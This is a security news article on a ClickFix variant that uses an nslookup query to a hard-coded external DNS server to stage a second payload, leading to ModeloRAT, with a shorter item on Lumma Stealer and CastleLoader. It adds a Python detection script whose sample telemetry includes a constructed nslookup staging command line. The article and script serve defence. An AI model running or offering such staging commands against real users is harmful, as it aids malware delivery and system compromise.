Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing commands that initiate a Domain Name System (DNS) lookup to fetch a secondary malicious payload.
In this updated approach, threat actors use the “nslookup” command—short for nameserver lookup—triggered through the Windows Run dialog. The command performs a custom DNS query that retrieves instructions for the next stage of the attack.
ClickFix has gained traction in recent years and is commonly distributed through phishing emails, malvertising campaigns, and drive-by download schemes. Victims are typically redirected to fraudulent landing pages featuring fake CAPTCHA checks or fabricated system alerts, urging them to run commands in the Windows Run dialog or the macOS Terminal app to “resolve” non-existent issues.
The technique has spread rapidly over the past two years because it relies on users unknowingly infecting their own systems, effectively bypassing traditional security safeguards. Its success has led to multiple offshoots, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
“In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts on X. “The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload.”
Microsoft explained that this variation uses DNS as a “lightweight staging or signaling channel,” allowing attackers to communicate with their infrastructure while introducing an additional validation layer before delivering the next payload.
“Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic,” the Windows maker added.
Following the DNS lookup, the attack chain downloads a ZIP archive from an external server (“azwsappdev[.]com”). Inside is a malicious Python script that conducts system reconnaissance, executes discovery commands, and drops a Visual Basic Script (VBScript). That VBScript launches ModeloRAT—a Python-based remote access trojan previously linked to CrashFix campaigns.
To maintain persistence, the malware creates a Windows shortcut (LNK) file in the Startup folder, ensuring automatic execution whenever the system reboots.
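As an added detection example (not code from Microsoft or the article), the following Python scores process-creation telemetry for the pattern described above: nslookup launched through cmd.exe against a hard-coded external resolver, with its output filtered for the "Name:" line. The Sysmon-style event fields, the approved-resolver list and the assumption that Run-dialog launches show explorer.exe as the parent of cmd.exe are all assumptions; the sample events are constructed.

```python
import ipaddress
import re
from dataclasses import dataclass

# Resolvers the organisation actually uses (constructed placeholder values).
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.0.54"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# nslookup [options] <name> <server>: capture an explicit IPv4 server argument.
NSLOOKUP_SERVER = re.compile(r"nslookup\s+(?:-\S+\s+)*\S+\s+(\d{1,3}(?:\.\d{1,3}){3})", re.I)

@dataclass
class ProcEvent:  # minimal process-creation record (Sysmon event ID 1 style; fields assumed)
    parent_image: str
    image: str
    command_line: str

def unapproved_resolver(command_line: str):
    """Return the hard-coded DNS server if it is external and not on the allow-list."""
    m = NSLOOKUP_SERVER.search(command_line)
    if not m or m.group(1) in APPROVED_RESOLVERS:
        return None
    try:
        ip = ipaddress.ip_address(m.group(1))
    except ValueError:  # e.g. an octet above 255
        return None
    return None if any(ip in net for net in INTERNAL_NETS) else m.group(1)

def dns_staging_indicators(ev: ProcEvent) -> list:
    """Collect reasons an event matches the ClickFix DNS-staging pattern."""
    reasons, cl = [], ev.command_line.lower()
    if "nslookup" not in cl:
        return reasons
    server = unapproved_resolver(ev.command_line)
    if server:
        reasons.append(f"nslookup against hard-coded external resolver {server}")
    if "name:" in cl and ("findstr" in cl or " find " in cl):
        reasons.append('nslookup output filtered for the "Name:" line')
    if "for /f" in cl:
        reasons.append("DNS answer captured into a loop variable (response executed)")
    # Assumption: a Run-dialog launch shows explorer.exe as the parent of cmd.exe.
    if ev.image.lower().endswith("cmd.exe") and ev.parent_image.lower().endswith("explorer.exe"):
        reasons.append("cmd.exe spawned by explorer.exe (Run dialog pattern)")
    return reasons

SAMPLE_EVENTS = [  # constructed telemetry; 203.0.113.0/24 is documentation address space
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c nslookup stage.example.invalid 203.0.113.7 | findstr "Name:"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nslookup.exe",
              "nslookup fileserver.corp.example 10.0.0.53"),
]
```

Each reason is a separate signal; in practice the combination of an external resolver plus the "Name:" filter on a cmd.exe spawned from the Run dialog is the high-confidence match, while a lone nslookup to an internal resolver is routine administration.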
Lumma Stealer and CastleLoader Activity Intensifies
Separately, Bitdefender has reported a spike in Lumma Stealer operations, fueled by ClickFix-style fake CAPTCHA campaigns. These attacks deploy an AutoIt-based version of CastleLoader, a loader attributed to a threat actor known as GrayBravo (formerly TAG-150).
CastleLoader checks for virtualization environments and certain security software before decrypting and executing the stealer in memory. Beyond ClickFix tactics, attackers are also using websites offering cracked software and pirated movies to lure victims into downloading malicious installers disguised as MP4 files.
[…]
This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents